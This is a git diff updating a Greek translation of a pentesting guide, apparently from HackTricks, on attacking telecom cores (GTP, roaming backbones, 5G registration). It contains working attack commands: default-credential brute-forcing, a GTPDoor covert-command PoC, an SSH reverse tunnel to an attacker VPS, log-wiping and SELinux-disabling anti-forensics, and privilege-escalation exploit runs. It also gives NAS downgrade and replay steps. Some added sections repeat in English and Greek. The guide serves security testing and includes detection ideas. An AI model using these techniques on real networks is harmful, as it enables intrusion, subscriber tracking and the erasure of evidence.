diff --git a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
index 7677f1106..dc36d7db7 100644
--- a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
@@ -1,27 +1,27 @@
-# Telecom Network Exploitation (GTP / Roaming Environments)
+# Εκμετάλλευση Δικτύου Τηλεπικοινωνιών (GTP / Περιβάλλοντα Roaming)
 
 {{#include ../../banners/hacktricks-training.md}}
 
 > [!NOTE]
-> Οι πρωτόκολλοι κινητής πυρήνας (GPRS Tunnelling Protocol – GTP) συχνά διασχίζουν ημι-εμπιστευτικά GRX/IPX roaming backbones. Επειδή διακινούνται μέσω απλού UDP με σχεδόν καμία αυθεντικοποίηση, **οποιοδήποτε σημείο εισόδου μέσα σε ένα τηλεπικοινωνιακό περίγραμμα μπορεί συνήθως να φτάσει απευθείας στους πυρήνες σήμανσης**. Οι παρακάτω σημειώσεις συγκεντρώνουν επιθετικές τεχνικές που παρατηρήθηκαν στην πράξη κατά SGSN/GGSN, PGW/SGW και άλλους κόμβους EPC.
+> Οι πρωτόκολλοι mobile-core (GPRS Tunnelling Protocol – GTP) συχνά διασχίζουν ημι-εμπιστευτικά GRX/IPX roaming backbones. Επειδή κινούνται πάνω σε απλό UDP με σχεδόν καθόλου authentication, **οποιαδήποτε παρουσία εντός της περιμέτρου ενός τηλεπικοινωνιακού δικτύου συνήθως μπορεί να φτάσει απευθείας τα core signalling planes**. Οι ακόλουθες σημειώσεις συγκεντρώνουν offensive tricks που παρατηρήθηκαν in the wild εναντίον SGSN/GGSN, PGW/SGW και άλλων EPC nodes.
 
-## 1. Recon & Initial Access
+## 1. Αναγνώριση & Αρχική Πρόσβαση
 
-### 1.1  Default OSS / NE Accounts
-Ένα εκπληκτικά μεγάλο σύνολο στοιχείων δικτύου προμηθευτών έρχεται με σκληρά κωδικοποιημένους χρήστες SSH/Telnet όπως `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, …  Μια αφιερωμένη λίστα λέξεων αυξάνει δραματικά την επιτυχία της βίαιης επίθεσης:
+### 1.1  Προεπιλεγμένοι λογαριασμοί OSS / NE
+Ένας εκπληκτικά μεγάλος αριθμός vendor network elements παραδίδεται με hard-coded SSH/Telnet χρήστες όπως `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, …  Ένα αφιερωμένο wordlist αυξάνει δραματικά την επιτυχία σε brute-force:
 ```bash
 hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
 ```
-Αν η συσκευή εκθέτει μόνο ένα VRF διαχείρισης, κάντε pivot μέσω ενός jump host πρώτα (δείτε την ενότητα «SGSN Emu Tunnel» παρακάτω).
+Αν η συσκευή εκθέτει μόνο ένα management VRF, pivot μέσω ενός jump host πρώτα (βλέπε ενότητα «SGSN Emu Tunnel» παρακάτω).
 
-### 1.2  Ανακάλυψη Φιλοξενουμένων μέσα στο GRX/IPX
-Οι περισσότεροι πάροχοι GRX εξακολουθούν να επιτρέπουν **ICMP echo** μέσω του backbone. Συνδυάστε το `masscan` με τους ενσωματωμένους UDP probes `gtpv1` για να χαρτογραφήσετε γρήγορα τους GTP-C listeners:
+### 1.2  Host Discovery εντός GRX/IPX
+Οι περισσότεροι GRX operators εξακολουθούν να επιτρέπουν **ICMP echo** σε όλο το backbone. Συνδυάστε το `masscan` με τους ενσωματωμένους `gtpv1` UDP probes για να χαρτογραφήσετε γρήγορα τους GTP-C listeners:
 ```bash
 masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
 ```
 ## 2. Απαρίθμηση Συνδρομητών – `cordscan`
 
-Το παρακάτω εργαλείο Go δημιουργεί πακέτα **GTP-C Create PDP Context Request** και καταγράφει τις απαντήσεις. Κάθε απάντηση αποκαλύπτει τον τρέχοντα **SGSN / MME** που εξυπηρετεί την ερωτηθείσα IMSI και, μερικές φορές, το επισκεπτόμενο PLMN του συνδρομητή.
+Το ακόλουθο εργαλείο Go συνθέτει **GTP-C Create PDP Context Request** πακέτα και καταγράφει τις απαντήσεις. Κάθε απάντηση αποκαλύπτει τον τρέχοντα **SGSN / MME** που εξυπηρετεί το ερωτηθέν IMSI και, μερικές φορές, το PLMN που επισκέφθηκε ο συνδρομητής.
 ```bash
 # Build
 GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
@@ -29,12 +29,12 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
 # Usage (typical):
 ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
 ```
-Κύριες σημαίες:
-- `--imsi` Στοχευόμενος συνδρομητής IMSI
-- `--oper` Οικιακός / HNI (MCC+MNC)
-- `-w`      Γράψτε ακατέργαστα πακέτα σε pcap
+Κύριες επιλογές:
+- `--imsi` IMSI του στοχευόμενου συνδρομητή
+- `--oper` Home / HNI (MCC+MNC)
+- `-w`      Γράφει ακατέργαστα πακέτα σε pcap
 
-Σημαντικές σταθερές μέσα στο δυαδικό αρχείο μπορούν να διορθωθούν για να διευρύνουν τις σάρωσεις:
+Σημαντικές σταθερές μέσα στο binary μπορούν να τροποποιηθούν για να διευρύνουν τις σαρώσεις:
 ```
 pingtimeout       = 3   // seconds before giving up
 pco               = 0x218080
@@ -42,9 +42,9 @@ common_tcp_ports  = "22,23,80,443,8080"
 ```
 ## 3. Εκτέλεση Κώδικα μέσω GTP – `GTPDoor`
 
-`GTPDoor` είναι μια μικρή υπηρεσία ELF που **δεσμεύει το UDP 2123 και αναλύει κάθε εισερχόμενο πακέτο GTP-C**. Όταν το payload ξεκινά με μια προ-μοιρασμένη ετικέτα, το υπόλοιπο αποκρυπτογραφείται (AES-128-CBC) και εκτελείται μέσω του `/bin/sh -c`. Η stdout/stderr εξάγονται μέσα σε **μηνύματα Echo Response** έτσι ώστε να μην δημιουργηθεί ποτέ εξωτερική συνεδρία.
+`GTPDoor` είναι μια μικρή υπηρεσία ELF που **binds UDP 2123 and parses every incoming GTP-C packet**. Όταν το payload ξεκινάει με ένα pre-shared tag, το υπόλοιπο αποκρυπτογραφείται (AES-128-CBC) και εκτελείται μέσω `/bin/sh -c`. Το stdout/stderr εξάγεται μέσα σε **Echo Response** μηνύματα, έτσι ώστε να μην δημιουργείται ποτέ εξωτερική session.
 
-Ελάχιστο πακέτο PoC (Python):
+Ελάχιστο PoC packet (Python):
 ```python
 import gtpc, Crypto.Cipher.AES as AES
 key = b"SixteenByteKey!"
@@ -53,39 +53,39 @@ enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
 print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
 ```
 Ανίχνευση:
-* οποιοσδήποτε κόμβος στέλνει **μη ισορροπημένα Echo Requests** σε IP SGSN
-* η σημαία έκδοσης GTP ρυθμισμένη σε 1 ενώ ο τύπος μηνύματος = 1 (Echo) – απόκλιση από την προδιαγραφή
+* οποιοσδήποτε host που στέλνει **unbalanced Echo Requests** προς τα SGSN IPs
+* GTP version flag ορισμένο σε 1 ενώ message type = 1 (Echo) — απόκλιση από το spec
 
-## 4. Pivoting Through the Core
+## 4. Pivoting μέσω του Core
 
 ### 4.1  `sgsnemu` + SOCKS5
-`OsmoGGSN` παρέχει έναν εξομοιωτή SGSN ικανό να **δημιουργήσει ένα PDP context προς έναν πραγματικό GGSN/PGW**. Μόλις διαπραγματευτεί, το Linux λαμβάνει μια νέα διεπαφή `tun0` προσβάσιμη από τον περιπλανώμενο ομότιμο.
+`OsmoGGSN` παρέχει έναν εξομοιωτή SGSN ικανό να **establish a PDP context towards a real GGSN/PGW**. Μόλις συμφωνηθεί, το Linux λαμβάνει μια νέα διεπαφή `tun0` προσβάσιμη από το roaming peer.
 ```bash
 sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
 -APN internet -c 1 -d
 ip route add 172.16.0.0/12 dev tun0
 microsocks -p 1080 &   # internal SOCKS proxy
 ```
-Με σωστό hair-pinning του firewall, αυτό το τούνελ παρακάμπτει τα VLAN που χρησιμοποιούνται μόνο για σήματα και σας προσγειώνει απευθείας στο **data plane**.
+Με κατάλληλο firewall hair-pinning, αυτό το tunnel παρακάμπτει signalling-only VLANs και σας οδηγεί απευθείας στο **data plane**.
 
 ### 4.2  SSH Reverse Tunnel over Port 53
-Το DNS είναι σχεδόν πάντα ανοιχτό σε υποδομές roaming.  Εκθέστε μια εσωτερική υπηρεσία SSH στο VPS σας που ακούει στο :53 και επιστρέψτε αργότερα από το σπίτι:
+Το DNS είναι σχεδόν πάντα ανοιχτό σε υποδομές roaming. Ανοίξτε μια εσωτερική υπηρεσία SSH στο VPS σας που ακούει στην :53 και επιστρέψτε αργότερα από το σπίτι:
 ```bash
 ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
 ```
-Ελέγξτε ότι το `GatewayPorts yes` είναι ενεργοποιημένο στον VPS.
+Ελέγξτε ότι `GatewayPorts yes` είναι ενεργοποιημένο στο VPS.
 
 ## 5. Κρυφά Κανάλια
 
 | Κανάλι | Μεταφορά | Αποκωδικοποίηση | Σημειώσεις |
-|--------|----------|----------------|------------|
-| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | καθαρός παθητικός ακροατής, χωρίς εξερχόμενη κίνηση |
-| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) κωδικοποιημένο σε A-record octets | παρακολουθεί για `*.nodep` υποτομέα |
-| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob σε ιδιωτικό IE | αναμειγνύεται με νόμιμο GTP-C θόρυβο |
+|--------|----------|-----------------|-----------|
+| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | απολύτως παθητικός ακροατής, χωρίς εξερχόμενη κίνηση |
+| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | παρακολουθεί για το υποτομέα `*.nodep` |
+| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | αναμειγνύεται με νόμιμη GTP-C κίνηση |
 
-Όλοι οι εμφυτευμένοι υλοποιούν watchdogs που **timestomp** τα δυαδικά τους και επανεκκινούν αν καταρρεύσουν.
+All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
 
-## 6. Cheatsheet Αποφυγής Άμυνας
+## 6. Οδηγός Αποφυγής Ανίχνευσης
 ```bash
 # Remove attacker IPs from wtmp
 utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
@@ -100,7 +100,7 @@ printf '\0' > /proc/$$/comm    # appears as [kworker/1]
 touch -r /usr/bin/time /usr/bin/chargen   # timestomp
 setenforce 0                              # disable SELinux
 ```
-## 7. Κλιμάκωση Δικαιωμάτων σε Κληρονομημένα NE
+## 7. Privilege Escalation σε Legacy NE
 ```bash
 # DirtyCow – CVE-2016-5195
 gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
@@ -111,30 +111,158 @@ python3 PwnKit.py
 # Sudo Baron Samedit – CVE-2021-3156
 python3 exploit_userspec.py
 ```
-Συμβουλή καθαρισμού:
+Συμβουλή για καθαρισμό:
 ```bash
 userdel firefart 2>/dev/null
 rm -f /tmp/sh ; history -c
 ```
 ## 8. Εργαλειοθήκη
 
-* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – προσαρμοσμένα εργαλεία που περιγράφονται σε προηγούμενες ενότητες.
-* `FScan` : εσωτερικές σάρωσεις TCP (`fscan -p 22,80,443 10.0.0.0/24`)
-* `Responder` : LLMNR/NBT-NS κακόβουλο WPAD
-* `Microsocks` + `ProxyChains` : ελαφρύ SOCKS5 pivoting
-* `FRP` (≥0.37) : NAT traversal / σύνδεση πόρων
+* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – custom tooling described in previous sections.
+* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
+* `Responder` : LLMNR/NBT-NS rogue WPAD
+* `Microsocks` + `ProxyChains` : lightweight SOCKS5 pivoting
+* `FRP` (≥0.37) : NAT traversal / asset bridging
+
+## 9. Επιθέσεις Εγγραφής 5G NAS: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
+
+Η διαδικασία εγγραφής 5G εκτελείται πάνω από NAS (Non-Access Stratum) επάνω στο NGAP. Μέχρι να ενεργοποιηθεί η ασφάλεια NAS από το Security Mode Command/Complete, τα αρχικά μηνύματα δεν είναι authenticated ή encrypted. Αυτό το παράθυρο pre-security επιτρέπει πολλαπλές επιθετικές διαδρομές όταν μπορείτε να παρατηρήσετε ή να παραποιήσετε N2 traffic (π.χ., on-path μέσα στον core, rogue gNB, ή testbed).
+
+Registration flow (simplified):
+- Registration Request: UE sends SUCI (encrypted SUPI) and capabilities.
+- Authentication: AMF/AUSF send RAND/AUTN; UE returns RES*.
+- Security Mode Command/Complete: NAS integrity and ciphering are negotiated and activated.
+- PDU Session Establishment: IP/QoS setup.
+
+Lab setup tips (non-RF):
+- Core: Open5GS default deployment is sufficient to reproduce flows.
+- UE: simulator or test UE; decode using Wireshark.
+- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
+- Useful display filters in Wireshark:
+- ngap.procedure_code == 15 (InitialUEMessage)
+- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
+
+### 9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI
+Αναμενόμενο: Η UE/USIM πρέπει να μεταδίδει SUCI (SUPI encrypted with the home-network public key). Η εύρεση ενός plaintext SUPI/IMSI στο Registration Request υποδεικνύει ένα πρόβλημα ιδιωτικότητας που επιτρέπει persistent subscriber tracking.
+
+Πώς να δοκιμάσετε:
+- Capture the first NAS message in InitialUEMessage and inspect the Mobile Identity IE.
+- Wireshark quick checks:
+- It should decode as SUCI, not IMSI.
+- Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` should exist; absence plus presence of `imsi` indicates leakage.
+
+Τι να συλλέξετε:
+- MCC/MNC/MSIN αν εκτίθενται; log ανά UE και παρακολούθηση σε βάθος χρόνου/τοποθεσιών.
+
+Μείωση κινδύνου:
+- Επιβάλετε SUCI-only UEs/USIMs; alert σε οποιοδήποτε IMSI/SUPI στο αρχικό NAS.
+
+### 9.2 Capability bidding-down to null algorithms (EEA0/EIA0)
+Υπόβαθρο:
+- Η UE διαφημίζει υποστηριζόμενα EEA (encryption) και EIA (integrity) στο UE Security Capability IE του Registration Request.
+- Συνηθισμένοι συσχετισμοί: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 είναι null algorithms.
+
+Πρόβλημα:
+- Επειδή το Registration Request δεν προστατεύεται με integrity, ένας on-path attacker μπορεί να καθαρίσει bits capability για να εξαναγκάσει την επιλογή EEA0/EIA0 αργότερα κατά το Security Mode Command. Κάποια stacks λανθασμένα επιτρέπουν null algorithms εκτός emergency services.
+
+Επιθετικά βήματα:
+- Intercept InitialUEMessage και τροποποιήστε το NAS UE Security Capability ώστε να διαφημίζει μόνο EEA0/EIA0.
+- Με Sni5Gect, hook το NAS message και patch τα capability bits πριν τα προωθήσετε.
+- Observe whether AMF accepts null ciphers/integrity and completes Security Mode with EEA0/EIA0.
+
+Επαλήθευση/ορατότητα:
+- Στο Wireshark, επιβεβαιώστε τα selected algorithms μετά το Security Mode Command/Complete.
+- Example passive sniffer output:
+```
+Encyrption in use [EEA0]
+Integrity in use [EIA0, EIA1, EIA2]
+SUPI (MCC+MNC+MSIN) 9997000000001
+```
+Μέτρα αντιμετώπισης (υποχρεωτικά):
+- Διαμορφώστε AMF/policy ώστε να απορρίπτει EEA0/EIA0 εκτός όπου είναι αυστηρά επιβεβλημένο (π.χ. κλήσεις έκτακτης ανάγκης).
+- Προτιμήστε την επιβολή EEA2/EIA2 ως ελάχιστο· κάντε log και alarm σε οποιοδήποτε NAS security context που διαπραγματεύεται null algorithms.
+
+### 9.3 Replay of αρχικού Registration Request (pre-security NAS)
+Επειδή το αρχικό NAS στερείται ακεραιότητας και φρεσκάδας, το καταγεγραμμένο InitialUEMessage+Registration Request μπορεί να γίνει replay προς AMF.
+
+PoC rule for 5GReplay to forward matching replays:
+```xml
+<beginning>
+<property value="THEN"
+property_id="101"
+type_property="FORWARD"
+description="Forward InitialUEMessage with Registration Request">
+
+<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
+<event value="COMPUTE"
+event_id="1"
+description="Trigger: InitialUEMessage"
+boolean_expression="ngap.procedure_code == 15"/>
+
+<!-- Context match on NAS Registration Request (message_type == 65) -->
+<event value="COMPUTE"
+event_id="2"
+description="Context: Registration Request"
+boolean_expression="nas_5g.message_type == 65"/>
+
+</property>
+</beginning>
+```
+What to observe:
+- Whether AMF accepts the replay and proceeds to Authentication; lack of freshness/context validation indicates exposure.
+Τι να παρατηρήσετε:
+- Εάν το AMF αποδέχεται το replay και προχωρά στην Authentication· η έλλειψη επαλήθευσης φρεσκάδας/context υποδηλώνει έκθεση.
+
+Mitigations:
+- Enforce replay protection/context binding at AMF; rate-limit and correlate per-GNB/UE.
+Μέτρα αντιμετώπισης:
+- Επιβάλλετε replay protection/context binding στο AMF· εφαρμόστε rate-limit και συσχετίστε ανά GNB/UE.
+
+### 9.4 Tooling pointers (reproducible)
+- Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS.
+- Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
+- 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
+- Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.
+### 9.4 Δείκτες εργαλείων (αναπαραγώγιμα)
+- Open5GS: στήστε ένα AMF/SMF/UPF για να μιμηθείτε τον core· παρακολουθήστε N2 (NGAP) και NAS.
+- Wireshark: επαληθεύστε τις αποκωδικοποιήσεις των NGAP/NAS· εφαρμόστε τα παραπάνω φίλτρα για να απομονώσετε τη Registration.
+- 5GReplay: καταγράψτε μια Registration, και μετά κάντε replay συγκεκριμένων μηνυμάτων NGAP + NAS σύμφωνα με τον κανόνα.
+- Sni5Gect: σε πραγματικό χρόνο sniff/modify/inject το NAS control-plane για να αναγκάσετε null algorithms ή να διαταράξετε ακολουθίες authentication.
+
+### 9.5 Defensive checklist
+- Continuously inspect Registration Request for plaintext SUPI/IMSI; block offending devices/USIMs.
+- Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
+- Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
+- Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.
+### 9.5 Λίστα ελέγχου άμυνας
+- Επιθεωρείτε συνεχώς τα Registration Request για SUPI/IMSI σε απλό κείμενο· μπλοκάρετε τις συσκευές/USIMs που παραβιάζουν.
+- Απορρίψτε EEA0/EIA0 εκτός από στενά ορισμένες διαδικασίες έκτακτης ανάγκης· απαιτήστε τουλάχιστον EEA2/EIA2.
+- Ανιχνεύστε rogue ή λανθασμένα ρυθμισμένη υποδομή: μη εξουσιοδοτημένα gNB/AMF, μη αναμενόμενοι N2 peers.
+- Ειδοποιήστε για NAS security modes που οδηγούν σε null algorithms ή σε συχνά replays του InitialUEMessage.
 
 ---
+## Detection Ideas
+1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**.
+2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs.
+3. **Frequent Echo Requests without corresponding Echo Responses** – might indicate GTPDoor beacons.
+4. **High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields**.
+5. 5G: **InitialUEMessage carrying NAS Registration Requests repeated from identical endpoints** (replay signal).
+6. 5G: **NAS Security Mode negotiating EEA0/EIA0** outside emergency contexts.
 ## Ιδέες Ανίχνευσης
-1. **Οποιαδήποτε συσκευή εκτός από SGSN/GGSN που δημιουργεί αιτήματα Δημιουργίας PDP Context**.
-2. **Μη τυπικές θύρες (53, 80, 443) που λαμβάνουν SSH handshakes** από εσωτερικές IP.
-3. **Συχνά Echo Requests χωρίς αντίστοιχες Echo Responses** – μπορεί να υποδηλώνει GTPDoor beacons.
-4. **Υψηλός ρυθμός κυκλοφορίας ICMP echo-reply με μεγάλα, μη μηδενικά πεδία αναγνωριστικού/ακολουθίας**.
+1. **Οποιαδήποτε συσκευή εκτός από SGSN/GGSN που δημιουργεί Create PDP Context Requests**.
+2. **Μη-τυπικές θύρες (53, 80, 443) που λαμβάνουν SSH handshakes** από εσωτερικά IP.
+3. **Συχνές Echo Requests χωρίς αντίστοιχες Echo Responses** – μπορεί να υποδηλώνει GTPDoor beacons.
+4. **Υψηλός ρυθμός ICMP echo-reply κυκλοφορίας με μεγάλα, μη-μηδενικά πεδία identifier/sequence**.
+5. 5G: **InitialUEMessage που μεταφέρει NAS Registration Requests επαναλαμβανόμενα από τα ίδια endpoints** (σήμα replay).
+6. 5G: **NAS Security Mode που διαπραγματεύεται EEA0/EIA0** εκτός έκτακτων περιπτώσεων.
 
-## Αναφορές
+## References
 
 - [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
 - 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
 - 3GPP TS 29.281 – GTPv2-C (v17.6.0)
+- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
+- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
+- 3GPP TS 33.501 – Security architecture and procedures for 5G System
 
 {{#include ../../banners/hacktricks-training.md}}